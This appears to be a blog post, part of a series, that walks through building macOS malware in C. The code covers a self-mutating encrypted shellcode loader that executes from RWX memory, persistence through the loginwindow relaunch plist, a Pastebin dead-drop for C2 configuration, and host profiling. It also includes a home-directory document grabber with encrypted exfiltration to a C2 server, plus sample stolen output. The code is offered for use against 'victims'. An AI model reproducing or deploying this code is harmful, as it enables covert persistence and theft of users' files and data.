It starts by preparing a PAGE_SIZE buffer mostly filled with NOPs (0x90), then injects the initial shellcode (dummy) into it. The tail of the shellcode is mutated to add some variability, and the remaining space is stuffed with architecture-specific junk instructions to boost obfuscation. Fresh AES keys and an IV are generated from entropy sources, then the entire buffer is encrypted and its SHA-256 hash computed. This encrypted payload is written back into the binary, and the mutation counter is set to 1.
For the ongoing mutation cycle, the implant decrypts the payload using the current AES keys, verifies its integrity with the stored hash, applies further mutations to the shellcode, generates new AES keys and IV, re-encrypts the mutated payload, updates the hash and mutation counter, saves the new payload back to the binary, and finally executes the mutated shellcode in memory.
int cook(uint8_t *dsec, size_t ds, chacha_state_t *rng) {
enc_header_t *hdr = (enc_header_t*)dsec;
uint8_t *payload = dsec + sizeof(enc_header_t);
uint8_t *dec = malloc(PAGE_SIZE);
if (!dec) { DBG("malloc failed"); return -1; }
decipher(hdr->key, hdr->iv, payload, dec, PAGE_SIZE);
#ifdef TEST
DBG("(pre-mutation)");
hexdump(dec, len, "Decrypted");
#endif
uint8_t comp[CC_SHA256_DIGEST_LENGTH];
CC_SHA256(payload, PAGE_SIZE, comp);
if (memcmp(hdr->hash, comp, CC_SHA256_DIGEST_LENGTH) != 0) panic();
uint8_t *shellcode_buffer = malloc(len);
if (!shellcode_buffer) { free(dec); DBG("malloc failed"); return -1; }
memcpy(shellcode_buffer, dec, len);
mut_sh3ll(shellcode_buffer, len, rng, hdr->count);
memcpy(dec, shellcode_buffer, len);
free(shellcode_buffer);
if (getentropy(hdr->key, KEY_SIZE) != 0 || getentropy(hdr->iv, kCCBlockSizeAES128) != 0) {
zer0(dec, PAGE_SIZE);
free(dec);
return -1;
}
cipher(hdr->key, hdr->iv, dec, payload, PAGE_SIZE);
CC_SHA256(payload, PAGE_SIZE, hdr->hash);
#ifdef TEST
DBG("(post-mutation)");
hexdump(payload, len, "Mutated");
#endif
save_section(dsec, ds);
#ifdef RELEASE
run();
#else
void *code_ptr;
if (posix_memalign(&code_ptr, PAGE_SIZE, PAGE_SIZE) != 0) {
panic();
free(dec);
return -1;
}
if (mprotect(code_ptr, PAGE_SIZE, PROT_READ|PROT_WRITE|PROT_EXEC) != 0) panic();
O2(code_ptr, dec, PAGE_SIZE);
if (mprotect(code_ptr, PAGE_SIZE, PROT_READ|PROT_EXEC) != 0) panic();
pop_shellcode(code_ptr, len);
free(code_ptr);
#endif
zer0(dec, PAGE_SIZE);
free(dec);
hdr->seed = chacha20_random(rng);
hdr->count++;
return 0;
}
It decrypts the current payload and validates its integrity by comparing SHA-256 hashes. Then, using the mutation counter, it mutates the decrypted shellcode. Fresh AES keys and an IV are generated before the mutated payload is encrypted and hashed again. This new payload is saved back into the binary, mutating the file on disk. When it’s time to run, the implant allocates RWX memory, copies the decrypted shellcode there, sets the right permissions and cache, and transfers execution.
Everything’s tight, the mutated shellcode runs straight from an executable memory region.
void pop_shellcode(uint8_t *code, size_t size) {
long ps = sysconf(_SC_PAGESIZE);
uintptr_t addr = (uintptr_t)code;
uintptr_t start = addr & ~(ps - 1);
size_t tot = ((addr + size) - start + ps - 1) & ~(ps - 1);
mprotect((void*)start, tot, PROT_READ | PROT_WRITE | PROT_EXEC);
#if defined(__arm__) || defined(__aarch64__)
__builtin___clear_cache((char*)code, (char*)code + size);
#endif
((void(*)(void))code)();
}
- Sets RWX, Clears CPU instruction cache
- Executes shellcode.
Init (first 72 bytes):
00000000 ed 17 71 d1 49 4c 68 7e 3c 8a 69 cb 03 2d 35 37 |..q.ILh~<.i..-57|
00000010 cc 88 e2 4b 6d 69 5b f3 9b a4 7f 9d 07 09 44 14 |...Kmi[.......D.|
00000020 29 38 1f dd 45 6d 38 ee c7 c8 fa 6e 6b be 4e 0d |)8..Em8....nk.N.|
00000030 e5 a8 8f 6b 21 2b 7f d5 91 c5 91 22 94 3e 12 32 |...k!+.....".>.2|
00000040 ba 5c 4f ff ed 2a d5 ae |.\O..*..|
(pre-mutation)
Decrypted (first 72 bytes):
00000000 48 31 d2 52 48 bb 2f 62 69 6e 2f 7a 73 68 53 48 |H1.RH./bin/zshSH|
00000010 89 e7 48 31 c0 66 b8 2d 63 50 48 89 e3 52 eb 0f |..H1.f.-cPH..R..|
00000020 53 57 48 89 e6 6a 3b 58 48 0f ba e8 19 0f 05 e8 |SWH..j;XH.......|
00000030 ec ff ff ff 6f 70 65 6e 20 2d 61 20 43 61 6c 63 |....open -a Calc|
00000040 75 6c 61 74 6f 72 00 52 |ulator.R|
(post-mutation)
Mutated (first 72 bytes):
00000000 e2 c0 d8 2a 3e e9 fa fb e3 8c c8 4f b4 05 0a 5c |...*>......O...\|
00000010 a7 a0 e0 16 c6 59 b2 9e 73 69 13 f7 b0 f2 d0 96 |.....Y..si......|
00000020 84 91 0f 3c b7 b9 d4 cc a8 cc 86 c0 b8 08 8a 8a |...<............|
00000030 01 d9 e4 c9 87 92 b6 12 cc e5 8a 2f 0f f5 f2 2e |.........../....|
00000040 3e 13 90 59 2f 97 d8 b0 |>..Y/...|
Before: 594b6f4139c6c9f0a222717d7cd6f37219d922bb26bfc4eb92740abdfe474d47
After : 9d744447d21c139817b16386643f83e46727fa57e07f515d0bc75ec21fe5f8da
Kinda obvious, right? After running the decryption routine, we get real shellcode:
48 31 d2 xor rdx, rdx
52 push rdx
48 bb 2f62696e2f7a7368 mov rbx, 0x68737a2f6e69622f ; "/bin/zsh"
53 push rbx
48 89 e7 mov rdi, rsp
This is x86_64 shellcode that spawns Calculator via zsh. Near the end, you’ll catch the full command embedded as a null-terminated string: open -a Calculator\0. After mutation, it’s the same payload, just reshaped. Functionally identical, but structurally scrambled. Totally unreadable again, as intended.
The hash mismatch (Before vs After) confirms the mutation.
PERSISTENCE
There’s a great blog series called Beyond Good Ol’ LaunchAgents that dives into various persistence techniques. Yep, it goes way beyond your run-of-the-mill LaunchAgents. Before we jump back into our piece and talk about how we implemented our persistence, let’s chat a bit about macOS persistence.
I tried to cover this in the first part, but I only scratched the surface and ran through some basic tricks that might not even work on today’s systems. So, let’s take another crack at it.
So we’ve got LaunchAgents and LaunchDaemons, both handled by launchd, responsible for managing processes automatically. LaunchAgents typically live in ~/Library/LaunchAgents for user-specific tasks and trigger when a user logs in. On the flip side, LaunchDaemons sit in /Library/LaunchDaemons and start at system boot.
Although LaunchAgents primarily operate within user sessions, they can also be found in system directories like /System/Library/LaunchAgents. LaunchDaemons, on the other hand, require privileges for installation and typically reside in /Library/LaunchDaemons.
Simply put, LaunchAgents are suitable for tasks requiring user interaction, while LaunchDaemons are better suited for background processes.
So what are we aiming for here? macOS stores info about apps that should automatically reopen when a user logs back in after a restart or logout. Basically, the apps open at shutdown get saved into a list that macOS checks at the next login. The preferences for this system are tucked away in a property list (plist) file that’s specific to each user and UUID.
Reference: https://theevilbit.github.io/beyond/beyond_0021/
You’ll find the plist at ~/Library/Preferences/ByHost/com.apple.loginwindow.<UUID>.plist and that <UUID> is tied to the specific hardware of your Mac. Now, you might be wondering how this ties into persistence. Since plist files in a user’s ~/Library directory are writable by that user, we can just… well, exploit that. And because macOS inherently uses this feature to launch legit applications, it trusts the com.apple.loginwindow plist as a bona fide system feature.
#include <CoreFoundation/CoreFoundation.h>
#include <mach-o/dyld.h>
// persistence entry.
void update(const char *plist_path) {
uint32_t bufsize = 0;
_NSGetExecutablePath(NULL, &bufsize);
char *exePath = malloc(bufsize);
if (!exePath || _NSGetExecutablePath(exePath, &bufsize) != 0) {
free(exePath);
return;
}
CFURLRef fileURL = CFURLCreateFromFileSystemRepresentation(NULL,
(const UInt8 *)plist_path, strlen(plist_path), false);
CFPropertyListRef propertyList = NULL;
CFDataRef data = NULL;
if (CFURLCreateDataAndPropertiesFromResource(NULL, fileURL, &data, NULL, NULL, NULL)) {
propertyList = CFPropertyListCreateWithData(NULL, data,
kCFPropertyListMutableContainers, NULL, NULL);
CFRelease(data);
}
// if no plist exists, make one.
if (propertyList == NULL) {
propertyList = CFDictionaryCreateMutable(kCFAllocatorDefault, 0,
&kCFTypeDictionaryKeyCallBacks, &kCFTypeDictionaryValueCallBacks);
}
// get (or create) the array for login items.
CFMutableArrayRef apps = (CFMutableArrayRef)
CFDictionaryGetValue(propertyList, CFSTR("TALAppsToRelaunchAtLogin"));
if (!apps) {
apps = CFArrayCreateMutable(kCFAllocatorDefault, 0, &kCFTypeArrayCallBacks);
CFDictionarySetValue((CFMutableDictionaryRef)propertyList,
CFSTR("TALAppsToRelaunchAtLogin"), apps);
CFRelease(apps);
}
// dictionaryir stuff
CFMutableDictionaryRef newApp = CFDictionaryCreateMutable(kCFAllocatorDefault,
3, &kCFTypeDictionaryKeyCallBacks, &kCFTypeDictionaryValueCallBacks);
int state = 2; // for now
CFNumberRef bgState = CFNumberCreate(kCFAllocatorDefault, kCFNumberIntType, &state);
CFDictionarySetValue(newApp, CFSTR("BackgroundState"), bgState);
CFRelease(bgState);
// executable's path.
CFStringRef exePathStr = CFStringCreateWithCString(kCFAllocatorDefault, exePath,
kCFStringEncodingUTF8);
CFDictionarySetValue(newApp, CFSTR("Path"), exePathStr);
CFRelease(exePathStr);
CFArrayAppendValue(apps, newApp);
// write back to disk.
CFDataRef newData = CFPropertyListCreateData(kCFAllocatorDefault, propertyList,
kCFPropertyListXMLFormat_v1_0, 0, NULL);
if (newData) {
FILE *plistFile = fopen(plist_path, "wb");
if (plistFile != NULL) {
fwrite(CFDataGetBytePtr(newData), sizeof(UInt8),
CFDataGetLength(newData), plistFile);
fclose(plistFile);
}
CFRelease(newData);
}
CFRelease(newApp);
CFRelease(propertyList);
CFRelease(fileURL);
free(exePath);
}
It’s self-explanatory: we simply modify the relaunch entries. If the TALAppsToRelaunchAtLogin key exists, it appends an entry for our piece. If it doesn’t, it creates the key and populates it with a new entry carrying the Path, the BackgroundState and the BundleID (the snippet above only sets the first two), then overwrites the original plist with the modified data.
The inclusion of the BackgroundState key is a subtle touch. By marking the piece as a background process, it makes sure the host treats it like any other background app during launch. It won’t show up glaringly in the Dock or draw attention like a full GUI application might.
PHONE HOME
Alright, so far we’ve mutated, encrypted, tossed in some anti-analysis, and even built a persistence variant to carry on. So, what’s next? Once everything’s set up, it’s time to confirm we’ve got a victim. To do that, the piece needs to initiate comms with us.
In part one, we pulled off a simple trick: we collected a detailed profile of the infected host (OS, kernel version, architecture, and other relevant metadata) and sent it over a plain socket, which by itself is unprotected. The first piece was something like this:
// Collect system information
void sys_info(RBuff *report) {
struct utsname u;
if (uname(&u) == 0) {
report->pointer += snprintf(report->buffer + report->pointer, sizeof(report->buffer) - report->pointer,
"[System Info]\nOS: %s\nVersion: %s\nArch: %s\nKernel: %s\n\n", u.sysname, u.version, u.machine, u.release);
}
}
// Collect user information
void user_info(RBuff *report) {
struct passwd *user = getpwuid(getuid());
if (user)
report->pointer += snprintf(report->buffer + report->pointer, sizeof(report->buffer) - report->pointer,
"[User Info]\nUsername: %s\nHome: %s\n\n", user->pw_name, user->pw_dir);
}
// Collect network information
void net_info(RBuff *report) {
struct ifaddrs *ifaces, *ifa;
if (getifaddrs(&ifaces) == 0) {
for (ifa = ifaces; ifa; ifa = ifa->ifa_next) {
if (ifa->ifa_addr && ifa->ifa_addr->sa_family == AF_INET) {
char ip[INET_ADDRSTRLEN];
inet_ntop(AF_INET, &((struct sockaddr_in *)ifa->ifa_addr)->sin_addr, ip, sizeof(ip));
report->pointer += snprintf(report->buffer + report->pointer, sizeof(report->buffer) - report->pointer,
"[Network Info]\nInterface: %s\nIP: %s\n\n", ifa->ifa_name, ip);
}
}
freeifaddrs(ifaces);
}
}
This is simple and effective. We could add encryption here to avoid sending the data raw and layer on all the usual techniques, but we ain’t gonna do that. I said something earlier about replacing this implementation with a single line: /usr/sbin/system_profiler -nospawn -detailLevel full
Well, let’s try it and see what’s what.
That command lets you gather detailed system info (OS version, hardware specs, etc.) without needing native API calls. It has its ups and downs: simple, yes, but visible and easy to notice. A simple popen can get the job done. Next, we generate a UUID for each system, which gives us a unique fingerprint to keep track of which is which and who’s who.
Alright, we’re introducing hybrid encryption. What does that mean? We encrypt the system profile with AES, then wrap the AES key with an RSA public key. Even if someone intercepts the message, they’d first have to break RSA to get the AES key before they can even think about decrypting the system data.
Now, you might say, “Why go to all this trouble for just some host info? Just XOR it, man!” And you’re right: if we were only sending basic data, something as simple as XOR (or even base64) would do the trick. But this setup lays the groundwork for more sensitive data we’ll be sending later.
Remember, we ain’t just gonna collect host info. We want a few more things, maybe a file grabber, a Keychain dump or even a backdoor, and this is the first communication with the C2, so we can’t afford to get burned on the initial try, or at least we should have the decency to protect our victim’s data. So, by fetching the RSA public key from a remote server, we can update or rotate keys as needed without changing the deployed client code. It’s a double-edged sword, but yeah..
Simple. Let’s call it overnout.c
/* 0x00s */
#include <openssl/evp.h>
#include <openssl/rsa.h>
#include <openssl/pem.h>
#include <curl/curl.h>
#include <openssl/aes.h>
#include <openssl/rand.h>
#include <sys/stat.h>
#include <sys/types.h>
#include <sys/sysctl.h>
#include <sys/utsname.h>
#include <uuid/uuid.h>
size_t callback(void *contents, size_t size, size_t nmemb, void *userp) {
size_t realsize = size * nmemb;
struct Mem *mem = (struct Mem *)userp;
char *ptr = realloc(mem->data, mem->size + realsize + 1);
if(ptr == NULL) return 0;
mem->data = ptr;
memcpy(&(mem->data[mem->size]), contents, realsize);
mem->size += realsize;
mem->data[mem->size] = 0;
return realsize;
}
RSA* get_rsa(const char* url) {
CURL *curl = curl_easy_init();
if (!curl) return NULL;
struct Mem mem;
mem.data = malloc(1);
mem.size = 0;
curl_easy_setopt(curl, CURLOPT_URL, url);
curl_easy_setopt(curl, CURLOPT_WRITEFUNCTION, callback);
curl_easy_setopt(curl, CURLOPT_WRITEDATA, (void *)&mem);
CURLcode res = curl_easy_perform(curl);
curl_easy_cleanup(curl);
// https://curl.se/libcurl/c/curl_easy_cleanup.html
if (res != CURLE_OK) {
free(mem.data);
return NULL;
}
BIO *bio = BIO_new_mem_buf(mem.data, mem.size);
RSA *rsa_pub = PEM_read_bio_RSA_PUBKEY(bio, NULL, NULL, NULL);
BIO_free(bio);
free(mem.data);
return rsa_pub;
}
void overn_out(const char *server_url, const char *data, size_t size) {
CURL *curl = curl_easy_init();
if (!curl) return;
struct curl_slist *headers = NULL;
headers = curl_slist_append(headers, "Content-Type: application/octet-stream");
curl_easy_setopt(curl, CURLOPT_URL, server_url);
curl_easy_setopt(curl, CURLOPT_HTTPHEADER, headers);
curl_easy_setopt(curl, CURLOPT_POSTFIELDS, data);
curl_easy_setopt(curl, CURLOPT_POSTFIELDSIZE, size);
CURLcode res = curl_easy_perform(curl);
curl_slist_free_all(headers);
curl_easy_cleanup(curl);
}
void profiler(char *buffer, size_t *offset) {
FILE *fp;
char line[1035];
fp = popen("system_profiler SPSoftwareDataType SPHardwareDataType", "r");
if (fp == NULL) {
return;
}
*offset += snprintf(buffer + *offset, B - *offset, "[Info]\n");
while (fgets(line, sizeof(line), fp) != NULL) {
*offset += snprintf(buffer + *offset, B - *offset, "%s", line);
}
fclose(fp);
}
void id(char *id) {uuid_t uuid;
uuid_generate_random(uuid);uuid_unparse(uuid, id);}
void sendprofile() {
// assign or NULL*
const char *prime; // REMOTE_C2
const char *p_key; // KEY
char buff[B] = {0};
size_t Pio = 0;
char system_id[37];
// system ID.
id(system_id);
Pio += snprintf(buff + Pio, sizeof(buff) - Pio, "ID: %s\n", system_id);
Pio += snprintf(buff + Pio, sizeof(buff) - Pio, "=== Host ===\n");
profiler(buff, &Pio);
unsigned char aes_key[16];
if (!RAND_bytes(aes_key, sizeof(aes_key))) {
// die
return;
}
unsigned char iv[AES_BLOCK_SIZE];
if (!RAND_bytes(iv, AES_BLOCK_SIZE)) {
// die
return;
}
// https://wiki.openssl.org/index.php/EVP_Authenticated_Encryption_and_Decryption
unsigned char ciphertext[B + AES_BLOCK_SIZE];
int ciphertext_len = 0;
EVP_CIPHER_CTX *ctx = EVP_CIPHER_CTX_new();
if (!ctx) {
// die
return;
}
if (1 != EVP_EncryptInit_ex(ctx, EVP_aes_128_cbc(), NULL, aes_key, iv)) {
EVP_CIPHER_CTX_free(ctx);
return;
}
int len = 0;
if (1 != EVP_EncryptUpdate(ctx, ciphertext, &len, (unsigned char*)buff, Pio)) {
EVP_CIPHER_CTX_free(ctx);
return;
}
ciphertext_len = len;
int final_len = 0;
if (1 != EVP_EncryptFinal_ex(ctx, ciphertext + len, &final_len)) {
EVP_CIPHER_CTX_free(ctx);
return;
}
ciphertext_len += final_len;
EVP_CIPHER_CTX_free(ctx);
// get the server's RSA public key
RSA *rsa_pub = get_rsa(p_key);
if (!rsa_pub) {
// die - should auto-destruct
return;
}
// encrypt the AES key using the RSA public key
int rsa_size = RSA_size(rsa_pub);
unsigned char *encrypted_key = malloc(rsa_size);
if (!encrypted_key) {
RSA_free(rsa_pub);
return;
}
int encrypted_key_len = RSA_public_encrypt(sizeof(aes_key), aes_key, encrypted_key,
rsa_pub, RSA_PKCS1_OAEP_PADDING);
if (encrypted_key_len == -1) {
free(encrypted_key);
RSA_free(rsa_pub);
return;
}
RSA_free(rsa_pub);
// package
int message_len = 4 + encrypted_key_len + AES_BLOCK_SIZE + 4 + ciphertext_len;
unsigned char *message = malloc(message_len);
if (!message) {
free(encrypted_key);
return;
}
unsigned char *p = message;
uint32_t ek_len_net = htonl(encrypted_key_len);
memcpy(p, &ek_len_net, 4);
p += 4;
memcpy(p, encrypted_key, encrypted_key_len);
p += encrypted_key_len;
free(encrypted_key);
// Write the IV.
memcpy(p, iv, AES_BLOCK_SIZE);
p += AES_BLOCK_SIZE;
// length.
uint32_t ct_len_net = htonl(ciphertext_len);
memcpy(p, &ct_len_net, 4);
p += 4;
memcpy(p, ciphertext, ciphertext_len);
// send the message
overn_out(prime, (const char*)message, message_len);
free(message);
}
And remember, malware is still just software. We can’t leave static remote C2 info hanging around (remember that anti-analysis section?). If it’s out there, it’s game over for both the malware and us. That’s why the best move is always having a kill switch, and making sure it doesn’t get used against your piece.
Here’s how the whole dance works: we hit a pastebin URL (encrypted in the vault like everything else), yank down what looks like garbage text, but it’s not. It’s structured: line one is a link to the RSA public key, line two is the actual C2. This gives us clean separation. If something burns, we don’t patch binaries, we just update the paste and keep it moving.
The parsing is dead simple, grab line 1 for the pubkey URL, line 2 for C2. Strip whitespace because you know someone’s gonna fuck up the formatting. It’s dumb, and that’s exactly what you want in live ops. (Don’t quote me on that.)
note: Seeing a Pastebin request from a binary would definitely make you go “what the fuck?”
And yeah, we wrap everything encrypted. Generate a fresh AES key, encrypt the payload with AES-CBC, then wrap that key with RSA. The wire format is clean - length-prefixed encrypted key, then IV, then length-prefixed encrypted payload. Network byte order because we’re not animals. The C2 server just needs to RSA decrypt the key, then AES decrypt the payload. Simple to implement on both ends.
unsigned char* wrap_loot(const unsigned char *plaintext, size_t plaintext_len,
size_t *out_len, RSA *rsa_pubkey) {
unsigned char aes_key[16], iv[BLOCK_SIZE];
if (!RAND_bytes(aes_key, sizeof(aes_key)) || !RAND_bytes(iv, BLOCK_SIZE))
return NULL;
// AES encrypt the payload
int max_ct = plaintext_len + BLOCK_SIZE;
unsigned char *ciphertext = malloc(max_ct);
EVP_CIPHER_CTX *ctx = EVP_CIPHER_CTX_new();
EVP_EncryptInit_ex(ctx, EVP_aes_128_cbc(), NULL, aes_key, iv);
int len_ct = 0, final_ct = 0;
EVP_EncryptUpdate(ctx, ciphertext, &len_ct, plaintext, plaintext_len);
EVP_EncryptFinal_ex(ctx, ciphertext + len_ct, &final_ct);
EVP_CIPHER_CTX_free(ctx);
int ciphertext_len = len_ct + final_ct;
// RSA encrypt the AES key
int rsa_size = RSA_size(rsa_pubkey);
unsigned char *encrypted_key = malloc(rsa_size);
int ek_len = RSA_public_encrypt(sizeof(aes_key), aes_key, encrypted_key,
rsa_pubkey, RSA_PKCS1_OAEP_PADDING);
// Package it all up: [key_len][encrypted_key][iv][data_len][encrypted_data]
*out_len = 4 + ek_len + BLOCK_SIZE + 4 + ciphertext_len;
unsigned char *message = malloc(*out_len);
unsigned char *p = message;
uint32_t net = htonl(ek_len);
memcpy(p, &net, 4); p += 4;
memcpy(p, encrypted_key, ek_len); p += ek_len;
memcpy(p, iv, BLOCK_SIZE); p += BLOCK_SIZE;
net = htonl(ciphertext_len);
memcpy(p, &net, 4); p += 4;
memcpy(p, ciphertext, ciphertext_len);
free(encrypted_key);
free(ciphertext);
return message;
}
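To make the layout concrete, here’s a minimal sketch of reading that framing back with bounds checks, which is what anyone picking apart a captured message would need. It does no crypto at all, it only splits [key_len][encrypted_key][iv][data_len][encrypted_data] into fields. The names frame_view, read_be32 and parse_frame are hypothetical and not from the original source, and the 16-byte IV length is an assumption taken from the AES block size used above.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>

#define IV_LEN 16 /* assumption: AES block size, matching the IV field */

/* Hypothetical view into a framed message; pointers alias the input buffer. */
typedef struct {
    const uint8_t *wrapped_key; uint32_t wrapped_key_len;
    const uint8_t *iv;
    const uint8_t *ciphertext;  uint32_t ciphertext_len;
} frame_view;

/* Read a 32-bit big-endian (network byte order) integer. */
uint32_t read_be32(const uint8_t *p) {
    return ((uint32_t)p[0] << 24) | ((uint32_t)p[1] << 16) |
           ((uint32_t)p[2] << 8)  |  (uint32_t)p[3];
}

/* Split a framed message into its fields.
 * Returns 0 on success, -1 if a length field does not fit the buffer
 * or the fields do not account for the whole buffer. */
int parse_frame(const uint8_t *buf, size_t len, frame_view *out) {
    assert(buf != NULL && out != NULL);
    size_t off = 0;

    if (len < 4) return -1;
    out->wrapped_key_len = read_be32(buf);
    off = 4;

    /* off <= len holds at every step, so len - off never underflows. */
    if (out->wrapped_key_len > len - off) return -1;
    out->wrapped_key = buf + off;
    off += out->wrapped_key_len;

    if (len - off < IV_LEN + 4) return -1;
    out->iv = buf + off;
    off += IV_LEN;

    out->ciphertext_len = read_be32(buf + off);
    off += 4;

    if (out->ciphertext_len != len - off) return -1;
    out->ciphertext = buf + off;
    return 0;
}
```

Every length is checked against what’s left in the buffer before it’s trusted, and a message with trailing or missing bytes is rejected outright instead of being partially parsed.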
The first contact with home profiles the target system. It uses system_profiler to dump hardware and software info, basically everything you’d want to know about the target environment. It generates a UUID for the victim, dumps the system info, wraps it all up with the crypto, and ships it off. We get a nice profile of what we’re dealing with before the file exfiltration even starts.
void collectSystemInfo(RSA *rsaPubKey) {
char buff[PAGE_SIZE]={0};
size_t offset = 0;
char system_id[37];
mint_uuid(system_id);
offset += snprintf(buff+offset, sizeof(buff)-offset, _strings[6], system_id);
offset += snprintf(buff+offset, sizeof(buff)-offset, _strings[7]);
profiler(buff,sizeof(buff),&offset);
size_t packaged_len = 0;
unsigned char *packaged = wrap_loot((unsigned char*)buff, offset, &packaged_len, rsaPubKey);
if (packaged) {
overn_out(C2_ENDPOINT, packaged, packaged_len);
free(packaged);
}
}
Once we lock in comms, it shifts gears and starts pulling info from the box. Two main moves here: profile the system in detail, and start exfiltrating target files. The file collection is where this thing gets nasty. It walks the entire home directory looking for anything interesting: docs, PDFs, text files. The ALLOWED array keeps it focused on the good stuff instead of hoovering up every .DS_Store file on the system. What you usually want to do is grab only recent files and scan them for anything notable, to keep things as stealthy as possible.
const char *ALLOWED[] = { "txt","doc","pdf",NULL };
int fileCollector(const char *fpath, const struct stat *sb, int typeflag, struct FTW *ftwbuf) {
if (fileCount >= MAX_FILES) return 0;
if (typeflag == FTW_F && sb->st_size > 0) {
const char *ext = strrchr(fpath, '.');
if (ext && ext != fpath) {
ext++;
for (int i=0; ALLOWED[i]; i++){
if (strcasecmp(ext, ALLOWED[i])==0){
char dst[512]={0};
snprintf(dst,sizeof(dst),"%s/%s", tmpDirectory, basename(fpath));
if (copyFile(fpath,dst)==0) {
file_t *o = malloc(sizeof(file_t));
o->path = strdup(dst);
o->size = sb->st_size;
files[fileCount++] = o;
}
break;
}
}
}
}
return 0;
}
We copy everything to a temp directory first, then tar it up. That keeps the original files untouched so the user doesn’t notice missing documents. The whole collection gets compressed with zlib before encryption, which is crucial when you’re exfiltrating potentially massive document collections over HTTP.
The whole thing is pretty simple:
- Hit the dead drop, parse out C2 config
- Grab the RSA public key from the specified URL
- Send system profile to establish the session
- Walk the filesystem collecting interesting files
- Tar + compress + encrypt the whole collection
- Ship it off to the C2 endpoint
- Clean up all traces
void sendFilesBundle(RSA *rsaPubKey) {
if (!fileCount) return;
char archivePath[512]={0};
const char *tmpId = tmpDirectory + 5;
snprintf(archivePath, sizeof(archivePath), _strings[3], tmpId);
char tarcmd[1024]={0};
snprintf(tarcmd,sizeof(tarcmd), _strings[2], archivePath, tmpDirectory);
if (system(tarcmd)) return;
// Read the tar file
FILE *fp = fopen(archivePath,"rb");
fseek(fp,0,SEEK_END);
long archiveSize = ftell(fp);
fseek(fp,0,SEEK_SET);
unsigned char *archiveData = malloc(archiveSize);
fread(archiveData,1,archiveSize,fp);
fclose(fp);
unlink(archivePath);
// Compress it
size_t compSize = 0;
unsigned char *compData = compressData(archiveData, archiveSize, &compSize);
free(archiveData);
// Encrypt and send
size_t packagedLen = 0;
unsigned char *pkg = wrap_loot(compData, compSize, &packagedLen, rsaPubKey);
free(compData);
if (pkg) {
overn_out(C2_ENDPOINT, pkg, packagedLen);
free(pkg);
}
}
Once it’s done, it nukes the temp files, kills the temp dir, and frees all the memory it touched. Clean exit. Nothing left except the files it exfiltrated, which the user still thinks are right where they left ’em.
[REMOTE HOST]
Saved to '/exfil05'
ID: EC001398-2683-46B9-823E-8CF1C570950D
=== Host ===
Software:
System Software Overview:
System Version: macOS Ventura 13.3.1 (Build 22D49)
Kernel Version: Darwin 22.4.0
Boot Volume: Macintosh HD
Boot Mode: Normal
Computer Name:
User Name: foo
Secure Virtual Memory: Enabled
System Integrity Protection: Enabled
Time since boot:
Hardware:
Hardware Overview:
Model Name: MacBook Pro
Model Identifier: MacBookPro18,1
Processor Name: 10-Core Intel Core i9
Processor Speed: 2.3 GHz
Hyper-Threading Technology: Enabled
Number of Processors: 1
Total Number of Cores: 10
Memory: 32 GB
System Firmware Version:
OS Loader Version:
SMC Version (system):
Serial Number (system):
Hardware UUID:
Provisioning UDID:
[DATA]
Exfil:
Extracted:
- ./color_128x.png,
- ./n_icon.png, ./preview.png,
- ./pyright-icon.png, ./icon.png
- ....
This thing’s built for smash-and-grab, not long chats. No persistent C2, no live tasking, no command backchannel. If the net’s down or the drop’s dead, it’s game over. That’s the tradeoff; I designed it that way for simplicity. One shot, in and out.
YOU’RE PWNED
What’s next? We circle back and dig into the stuff I left out on purpose. Yeah, some pieces were clipped, some feel like they’re missing something… I trimmed things to keep this from turning into a full-blown dissertation. Can’t dump it all at once. This is more of a sketchbook: just the core moves, enough to spark ideas. We’re not done. More’s coming, and next time, we’re going deep into the weird corners and edge cases. As always, see you next time!